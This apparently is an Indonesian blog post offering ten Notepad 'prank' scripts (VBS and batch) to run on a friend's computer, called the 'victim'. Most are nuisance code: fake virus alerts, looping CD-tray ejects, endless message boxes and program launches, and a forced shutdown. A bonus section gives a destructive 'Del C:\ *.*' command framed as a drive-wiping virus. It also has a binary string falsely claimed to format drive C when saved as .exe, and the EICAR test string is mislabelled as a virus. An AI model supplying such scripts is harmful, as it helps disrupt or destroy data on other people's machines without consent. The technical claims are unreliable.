MAGELANG1337.COM

Search

10 Cara Jail Ngerjain Teman Menggunakan NotePad


Notepad adalah sebuah program editor text yang ada di sistem operasi windows , Di notepad kamu bisa mengedit semua tulisan dari berbagai macam bahasa pemrograman, Ternyata selain untuk mengedit text notepad bisa kita gunakan untuk mengerjain teman. Ada 8 Trik Jail Ngerjain Teman Menggunakan NotePad.

Silahkan Buka Notepad kalian masing masing & inilah 8 Trik yang sayang jika tidak kalian cobain di notepad.

#1. Membuat tulisan slow motion di Windows

Silahkan kamu masukan script dibawah ini untuk membuat tulisan bergerak lambat di windows teman kamu.

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

Simpan notepad tersebut dengan klik tombol "Ctrl + S" dengan Format (.vbs) lihat gambar dibawah ini.


#2. Trik Membuat Tipuan Windows Error atau Rusak.

Trik ini bakalan buat jantung teman kamu berdetak kencang, Apalagi kalau teman kamu emang awam banget dengan komputer pasti dia akan bingung banget.

Silahkan tulisakan script berikut ini di notepad kamu dan simpan dengan format (.vbs)

Type X=Msgbox(“Windows Terinfeksi Virus Mematikan”,0+16,”Notifikasi Error Windows”)

#3. Trik membuat CDroom terbuka otomatis secara berulang ulang.


Kalau trik yang satu ini pasti akan bikin teman kamu kewalahan untuk menutup CDroom pada laptop atau komputer mereka, Apalagi kalau kamu jailin nya tengah malah pasti akan buat teman kamu ketakutan. Berikut script nya pastekan di notepad dan simpan dengan format vbs

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


#4. Membuat Virus sederhana di Notepad

Biasanya ini akan terdeteksi sebagai Virus pada komputer yang menggunakan antivirus tapi tenang ini hanya virus biasa yang tidak akan menyebabkan kerusakan pada komputer korban.Silhakan pastekan kode berikut dan simpan dalam format .exe

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

#5. Membuat Efek seperti di Film Matrix Pada CMD

Keren neh sayang banget kalau nggak kamu cobain langsung aja deh pastein kodenya di notepad dan simpan dalam format .bat

@echo off
color 02
:start
echo %random% %random% %random% 
%random% %random% %random% %random% 
%random% %random% %random%
goto start

#6. Membuat Chat Palsu di Windows

Pada script ini kita akan membuat program yang bertanya secara terus menerus pada komputer korban, Silahkan pastekan kode dibawah ini dan simpan dalam format .bat


@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

#7. Membuat Password Pada Folder di Windows menggunakan Notepad

Pastekan script berikut dan simpan dalam format .bat

@ECHO OFF
title Folder Private
if EXIST “Control Panel.{21EC2020-

3AEA-1069-A2DD-08002B30309D}” goto 

UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the 

folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private “Control Panel.{21EC2020-

3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-

3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock the 

folder
set/p “pass=>”
if NOT %pass%== Magelang1337 goto FAIL
attrib -h -s “Control Panel.{21EC2020-

3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069

-A2DD-08002B30309D}” Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

Keterangan Silahkan rubah password dengan mengganti magelang1337 pada script.

#8. Membuka Program Notepad secara terus menerus

Script ini tidak hanya bisa untuk membuka notepad namun bisa juga kamu gunakan untuk membuka berbagai program yang ada di komputer korban. Silahkan pastekan script berikut dan simpan dalam format .vbs


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

#9. Mematikan komputer secara otomatis menggunakan Notepad.

Pastekan script berikut dan simpan dalam format .bat

@echo offShutdown.exe -s -t 10clsmsg * Shutdown dulu ya komputernya!

#10. Merubah text menjadi suara menggunakan notepad

Silahkan paste script dibawah ini dan simpan dalam format .vbs

Dim message, sapi message=InputBox
(“Ini adalah trik notepad dari magelang1337.com”,”Hover pc Hacks 
Text-To-Audio Converter”) Set 
sapi=CreateObject(“sapi.spvoice”) 
sapi.Speak message

BONUS : 

#BONUS1 : Membuat virus penghapus Drive C menggunakan Notepad

Ini sangat tidak disarankan, Karena dapat menghapus semua isi dari Drive C di komputer korban kamu.

@Echo offDel C:\ *.* |y

Simpan script tersebut dalam format .bat

#BONUS2 : Format habis Drive C di komputer menggunakan Notepad


Ini juga tidak saya sarankan untuk digunakan jailin teman kasihan kan kalau drive c nya abis.

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

Simpan script dalam format .exe

SEMUA SCRIPTNYA KALIAN BISA MENDOWNLOAD DISINI >> KLIK 
Comments
0 Comments

No comments: